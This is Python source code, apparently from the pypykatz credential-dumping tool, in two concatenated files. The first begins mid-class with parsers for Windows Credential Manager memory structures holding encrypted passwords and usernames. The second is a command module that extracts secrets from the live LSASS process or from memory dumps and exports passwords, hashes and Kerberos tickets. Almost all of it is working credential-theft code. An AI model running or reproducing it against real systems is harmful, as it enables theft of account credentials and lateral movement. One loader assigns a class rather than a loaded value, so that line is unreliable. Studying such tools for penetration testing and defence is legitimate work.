		self.unk4 = None
		self.type = None
		self.unk5 = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None
		self.user = None
		self.unk11 = None
		self.server2 = None

	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_ENTRY_X86()
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		await reader.move(reader.tell() - 32)
		await reader.align() #not sure if it's needed here
		
		#
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword =await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName =await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY.load(reader)
		res.unk4 = await LIST_ENTRY.load(reader)
		res.type =await LSA_UNICODE_STRING.load(reader)
		res.unk5 = await PVOID.load(reader)
		res.server1 =await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.unk8 = await PVOID.load(reader)
		res.unk9 = await PVOID.load(reader)
		res.unk10 = await PVOID.load(reader)
		res.user =await LSA_UNICODE_STRING.load(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 =await LSA_UNICODE_STRING.load(reader)
		return res
		
		
class PKIWI_CREDMAN_LIST_ENTRY_5(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY_5()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY_5
		return p
		
class KIWI_CREDMAN_LIST_ENTRY_5:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.user = None
		self.unk8 = None
		self.server2 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_ENTRY_5()
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		await reader.move(reader.tell() - 56)
		await reader.align() #not sure if it's needed here
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword = await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName = await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY_5.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY_5.load(reader)
		res.server1 = await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.user = await LSA_UNICODE_STRING.load(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 = LSA_UNICODE_STRING
		return res
	
class PKIWI_CREDMAN_LIST_ENTRY_60(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY_60()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY_60
		return p

class KIWI_CREDMAN_LIST_ENTRY_60:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
		self.type = None
		self.unk5 = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None
		self.user = None
		self.unk11 = None
		self.server2 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_ENTRY_60()
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		await reader.move(reader.tell() - 56)
		await reader.align() #not sure if it's needed here
		#
		#input('KIWI_CREDMAN_LIST_ENTRY_60 \n%s' % hexdump(reader.peek(0x200), start = reader.tell()))
		#
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword =await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName = await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY_60.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY_60.load(reader)
		res.type =await LSA_UNICODE_STRING.load(reader)
		res.unk5 = await PVOID.load(reader)
		res.server1 =await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.unk8 = await PVOID.load(reader)
		res.unk9 = await PVOID.load(reader)
		res.unk10 = await PVOID.load(reader)
		res.user =await LSA_UNICODE_STRING.load(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 =await LSA_UNICODE_STRING.load(reader)
		return res
	
class PKIWI_CREDMAN_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_ENTRY
		return p
		
class KIWI_CREDMAN_LIST_ENTRY:
	def __init__(self):
		self.cbEncPassword = None
		self.encPassword = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.UserName = None
		self.cbUserName = None
		self.Flink = None
		self.Blink = None
		self.unk4 = None
		self.type = None
		self.unk5 = None
		self.server1 = None
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None
		self.user = None
		self.unk11 = None
		self.server2 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_ENTRY()
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		await reader.move(reader.tell() - 56)
		await reader.align() #not sure if it's needed here
		res.cbEncPassword = await ULONG.loadvalue(reader)
		await reader.align()
		res.encPassword =await PWSTR.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.UserName =await PWSTR.load(reader)
		res.cbUserName = await ULONG.loadvalue(reader)
		await reader.align()
		res.Flink = await PKIWI_CREDMAN_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_CREDMAN_LIST_ENTRY.load(reader)
		res.unk4 =await LIST_ENTRY.load(reader)
		res.type =await LSA_UNICODE_STRING.load(reader)
		res.unk5 = await PVOID.load(reader)
		res.server1 =await LSA_UNICODE_STRING.load(reader)
		res.unk6 = await PVOID.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.unk8 = await PVOID.load(reader)
		res.unk9 = await PVOID.load(reader)
		res.unk10 = await PVOID.load(reader)
		res.user = await LSA_UNICODE_STRING.load(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		await reader.align()
		res.server2 =await LSA_UNICODE_STRING.load(reader)
		return res

class PKIWI_CREDMAN_LIST_STARTER(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_LIST_STARTER()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_LIST_STARTER
		return p
		
class KIWI_CREDMAN_LIST_STARTER:
	def __init__(self):
		self.unk0 = None
		self.start = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_LIST_STARTER()
		res.unk0 = await ULONG.load(reader)
		await reader.align()
		res.start = await PKIWI_CREDMAN_LIST_ENTRY.load(reader)
		return res
	
class PKIWI_CREDMAN_SET_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_CREDMAN_SET_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_CREDMAN_SET_LIST_ENTRY
		return p
		
class KIWI_CREDMAN_SET_LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.list1 = None
		self.list2 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_CREDMAN_SET_LIST_ENTRY()
		res.Flink = await PKIWI_CREDMAN_SET_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_CREDMAN_SET_LIST_ENTRY.load(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		await reader.align()
		res.list1 = await PKIWI_CREDMAN_LIST_STARTER.load(reader)
		res.list2 = await PKIWI_CREDMAN_LIST_STARTER.load(reader)
		return res
		
		


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import json
import glob
import ntpath
import traceback
import base64

from pypykatz import logger
from pypykatz.pypykatz import pypykatz
from pypykatz.commons.common import UniversalEncoder
from pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession



class LSACMDHelper:
	def __init__(self):
		self.live_keywords = ['lsa']
		self.keywords = ['lsa']
		
	def add_args(self, parser, live_parser):
		live_group = live_parser.add_parser('lsa', help='Get all secrets from LSASS')
		live_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		live_group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		live_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		live_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		live_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		live_group.add_argument('--method', choices = ['procopen', 'handledup'], default = 'procopen', help = 'LSASS process access method')
		live_group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse')


		group = parser.add_parser('lsa', help='Get secrets from memory dump')
		group.add_argument('cmd', choices=['minidump','rekall'])
		group.add_argument('memoryfile', help='path to the dump file')
		group.add_argument('-t','--timestamp_override', type=int, help='enforces msv timestamp override (0=normal, 1=anti_mimikatz)')
		group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing')
		group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder')
		group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap', 'kerberos'], nargs="+", default = 'all', help = 'LSASS package to parse')
		
	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			self.run(args)
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
			
	def process_results(self, results, files_with_error, args):
		if args.outfile and args.json:
			with open(args.outfile, 'w') as f:
				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)

		elif args.outfile and args.grep:
			with open(args.outfile, 'w', newline = '') as f:
				f.write(':'.join(LogonSession.grep_header) + '\r\n')
				for result in results:
					for luid in results[result].logon_sessions:
						for row in results[result].logon_sessions[luid].to_grep_rows():
							f.write(':'.join(row) + '\r\n')
		
		elif args.outfile:
			with open(args.outfile, 'w') as f:
				for result in results:
					f.write('FILE: ======== %s =======\n' % result)
					
					for luid in results[result].logon_sessions:
						f.write('\n'+str(results[result].logon_sessions[luid]))
					
					if len(results[result].orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in results[result].orphaned_creds:
							f.write(str(cred))
					
				if len(files_with_error) > 0:
					f.write('\n== Failed to parse these files:\n')
					for filename in files_with_error:
						f.write('%s\n' % filename)
						
		elif args.json:
			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
		
		elif args.grep:
			if hasattr(args, 'directory') and args.directory is not None:
				print(':'.join(['filename'] + LogonSession.grep_header))
			else:
				print(':'.join(LogonSession.grep_header))
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						if hasattr(args, 'directory') and args.directory is not None:
							row = [result] + row
						print(':'.join(row))
				for cred in results[result].orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] != 'dpapi':
						if t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							if hasattr(args, 'directory') and args.directory is not None:
								x = [result] + x
							print(':'.join(x))
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						if hasattr(args, 'directory') and args.directory is not None:
							x = [result] + x
						print(':'.join(x))
				
				for pkg, err in results[result].errors:
					err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
					err_str = base64.b64encode(err_str.encode()).decode()
					x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str]
					if hasattr(args, 'directory') and args.directory is not None:
						x = [result] + x
					print(':'.join(x) + '\r\n')
		else:
			for result in results:
				print('FILE: ======== %s =======' % result)	
				if isinstance(results[result], str):
					print(results[result])
				else:
					for luid in results[result].logon_sessions:
						print(str(results[result].logon_sessions[luid]))
							
					if len(results[result].orphaned_creds) > 0:
						print('== Orphaned credentials ==')
						for cred in results[result].orphaned_creds:
							print(str(cred))
					
					if len(results[result].errors) > 0:
						print('== Errors ==')
						for pkg, err in results[result].errors:
							err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
							logger.debug(err_str)
							err_str = base64.b64encode(err_str.encode()).decode()
							print('%s %s' % (pkg+'_exception_please_report',err_str))
							
					

			if len(files_with_error) > 0:			
				print('\n==== Parsing errors:')
				for filename in files_with_error:
					print(filename)
		
		
		if args.kerberos_dir:
			dir = os.path.abspath(args.kerberos_dir)
			logger.info('Writing kerberos tickets to %s' % dir)
			for filename in results:
				base_filename = ntpath.basename(filename)
				ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
				results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
				for luid in results[filename].logon_sessions:
					for kcred in results[filename].logon_sessions[luid].kerberos_creds:
						for ticket in kcred.tickets:
							ticket.to_kirbi(dir)
							
				for cred in results[filename].orphaned_creds:
					if cred.credtype == 'kerberos':
						for ticket in cred.tickets:
							ticket.to_kirbi(dir)
		
	def run_live(self, args):
		files_with_error = []
		results = {}
		if args.module == 'lsa':
			filename = 'live'
			try:
				if args.kerberos_dir is not None and 'all' not in args.packages:
					args.packages.append('ktickets')
				if args.method == 'procopen':
					mimi = pypykatz.go_live(packages=args.packages)
				elif args.method == 'handledup':
					mimi = pypykatz.go_handledup(packages=args.packages)
					if mimi is None:
						raise Exception('HANDLEDUP failed to bring any results!')
				results['live'] = mimi
				if args.halt_on_error == True and len(mimi.errors) > 0:
					raise Exception('Error in modules!')
			except Exception as e:
				files_with_error.append(filename)
				if args.halt_on_error == True:
					raise e
				else:
					print('Exception while dumping LSA credentials from memory.')
					traceback.print_exc()
					pass
					
			self.process_results(results, files_with_error,args)
			
	def run(self, args):
		files_with_error = []
		results = {}
		###### Rekall
		if args.cmd == 'rekall':
			if args.kerberos_dir is not None and 'all' not in args.packages:
				args.packages.append('ktickets')
			mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile, args.timestamp_override, packages=args.packages)
			results['rekall'] = mimi
	
		###### Minidump
		elif args.cmd == 'minidump':
			if args.directory:
				dir_fullpath = os.path.abspath(args.memoryfile)
				file_pattern = '*.dmp'
				if args.recursive == True:
					globdata = os.path.join(dir_fullpath, '**', file_pattern)
				else:	
					globdata = os.path.join(dir_fullpath, file_pattern)
					
				logger.info('Parsing folder %s' % dir_fullpath)
				for filename in glob.glob(globdata, recursive=args.recursive):
					logger.info('Parsing file %s' % filename)
					try:
						if args.kerberos_dir is not None and 'all' not in args.packages:
							args.packages.append('ktickets')
						mimi = pypykatz.parse_minidump_file(filename, packages=args.packages)
						results[filename] = mimi
						if args.halt_on_error == True and len(mimi.errors) > 0:
							raise Exception('Error in modules!')
					except Exception as e:
						files_with_error.append(filename)
						logger.exception('Error parsing file %s ' % filename)
						if args.halt_on_error == True:
							raise e
						else:
							pass
					
			else:
				logger.info('Parsing file %s' % args.memoryfile)
				try:
					if args.kerberos_dir is not None and 'all' not in args.packages:
						args.packages.append('ktickets')
					mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
					results[args.memoryfile] = mimi
					if args.halt_on_error == True and len(mimi.errors) > 0:
						raise Exception('Error in modules!')
				except Exception as e:
					logger.exception('Error while parsing file %s' % args.memoryfile)
					if args.halt_on_error == True:
						raise e
					else:
						traceback.print_exc()
						
		self.process_results(results, files_with_error, args)